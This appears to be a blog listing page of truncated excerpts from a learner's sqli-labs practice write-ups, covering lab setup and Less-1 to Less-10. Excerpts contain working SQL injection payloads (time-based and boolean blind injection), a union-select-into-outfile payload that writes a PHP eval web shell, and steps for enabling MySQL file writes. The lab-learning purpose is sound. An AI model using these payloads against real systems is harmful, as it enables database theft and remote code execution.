lili‘s sqli-labs
Debbie Li
这个作者很懒,什么都没留下…
展开
-
lili‘s sqli-labs LESS09&LESS10
LESS091.http://127.0.0.1/sqli-labs-master/Less-9/?id=1'order by 3999--+c此时无论如何order by的值是多少都显示you are in......,所以不能使用这个判断2.http://127.0.0.1/sqli-labs-master/Less-9/?id=1'and sleep(5)--+他一直正在执行转圈圈~并且返回正常,说明存在漏洞(如果存在漏洞,睡眠五秒返回结果)3.时间盲注方法进行判断(less0..原创 2021-02-18 00:49:31 · 160 阅读 · 0 评论 -
lili‘s sqli-labs LESS08
布尔盲注,可以参考less051.http://127.0.0.1/sqli-labs-master/Less-8/?id=1' 判断此时存在注入漏洞,2.http://127.0.0.1/sqli-labs-master/Less-8/?id=1' --+ 显示you are in........3.http://127.0.0.1/sqli-labs-master/Less-8/?id=1' order by 3--+,说明存在三列4.参考less05,先判断数据库名,然后二分...原创 2021-02-18 00:31:32 · 125 阅读 · 0 评论 -
lili‘s sqli-labs Less07
1.http://localhost/sqli-labs-master/Less-7/?id=1')) order by 3--+2.http://127.0.0.1/sqli-labs-master/Less-7/?id=1')) union select 1,2,'<?php @eval($_POST["crow"]);?>' into outfile 'E:\\tools\\phpstudy\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\a原创 2021-02-18 00:04:41 · 135 阅读 · 0 评论 -
lili’s sqli-labs LESS7,8,9,10 补充知识
1.show variables like '%secure%';查看secure-file-priv当前的值,如果显示为NULL,则需要打开E:\tools\phpstudy\phpstudy_pro\Extensions\MySQL5.7.26\my.ini文件,在其中加一句:secure-file-priv="/".2.一句话木马:php版本:<?php @eval($_POST["crow"]);?>其中crow是密码(H:\xxxxxxx\Cracer\Cracer安全工具包V原创 2021-02-17 23:27:46 · 133 阅读 · 0 评论 -
lili‘s sqli-labs LESS06
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";第六关与第五关的不同之处是第五关:http://localhost/sqli-labs-master/Less-5/?id=1'第六关:http://localhost/sqli-labs-master/Less-6/?id=1"其余步骤一样~原创 2021-02-17 21:48:33 · 133 阅读 · 0 评论 -
lili’s LESS05盲注!!(小猪崽觉得这是个什么玩意儿嘤嘤嘤)
一.BOOL型-11.http://localhost/sqli-labs-master/Less-5/?id=1' 查看是否注入2.http://localhost/sqli-labs-master/Less-5/?id=1'order by 3--+ 查看有多少列出现··you are in .......表示成功3.http://localhost/sqli-labs-master/Less-5/?id=1'and left((select database()),1)='s'--+.原创 2021-02-17 21:28:32 · 119 阅读 · 0 评论 -
lili‘s LESS05前知识补充
切换数据库:use security;1.left()函数:left(databaxe(),1)='s' left(a,b)从左侧截取a的前b位,正确则返回1,错误返回0(1)select database(); ——查询当前使用的数据库(2)select left(database(),1)='s'; ——前一位是否是s2.regexp函数:select user() regexp 'r' user()的结果是root,regexp为匹配root的正则表达式(1)select da..原创 2021-02-14 14:43:51 · 148 阅读 · 0 评论 -
lili‘s sqli-labs LESS-3&LESS-4
LESS03输入?Id=1’后出现错误应为http://127.0.0.1/sqlilabs/Less-3/?id=2’)–+错误提示为”2”)LIMIT 0,1’.去掉前后两个单引号,和自己输入的一个单引号后还有两个单引号和一个括号,可推出sql注入中的由单引号和括号和起来的闭合模式。LESS04127.0.0.1/sqlilabs/Less-4/id=1’后没有出现错误提示:输入:127.0.0.1/sqlilabs/Less-4/id=1”后出现错误提示,’”1””)LIMIT 0,原创 2021-02-08 23:18:44 · 143 阅读 · 0 评论 -
lili‘s sqli-labs less02(小猪崽有新发现)
今天拿到驾照啦~就很快落o! 没想到我这么胆小的油呆头鹅人也可以拿到(●ˇ∀ˇ●)!!因为疫情原因在学校被封闭了好久,导致战线拉得很长别人都是四十天我是四个月诶╥﹏╥... 但!!结果总归是好的,这是②〇②①年的第一个证书了(●'◡'●)突然惊奇的发现less01和less02的测试流程好像欸~一.复习MySQL常见查询语句select table_name from information_schema.tables where table_schema = 'security';sele原创 2021-02-07 23:14:24 · 154 阅读 · 0 评论 -
lili‘s sqli-labs less01(简直是在为难我小猪崽)
1.方便注入时对sql语句进行判断在sqli-labs代码里加入:echo $sql;echo "<br>";2.我使用的火狐浏览器,添加HackBar原创 2021-02-04 21:41:54 · 203 阅读 · 1 评论 -
MySQL基本用法
1.查库:select schea_name from information_schema.schemata2.查表:select table_name from information_scema.tables where table_schema='security'3.查列:select column_name from information_schema.columns where table_name='users'4.查字段:select username,password f.原创 2021-02-02 22:18:17 · 96 阅读 · 0 评论 -
sqli-labs安装(傻瓜版)
1.安装phpstudy安装成功如图所示2.安装sqli-labs-masters网址:https://github.com/Audi-1/sqli-labs将sqli-labs-masters解压,放到phpStudy安装目录下的E:\tools\phpstudy\phpstudy_pro\WWW3.修改E:\tools\phpstudy\phpstudy_pro\WWW\sqli-labs-masters\sql-connections\db-creds.inc文件中mysql.原创 2021-02-02 16:16:28 · 697 阅读 · 0 评论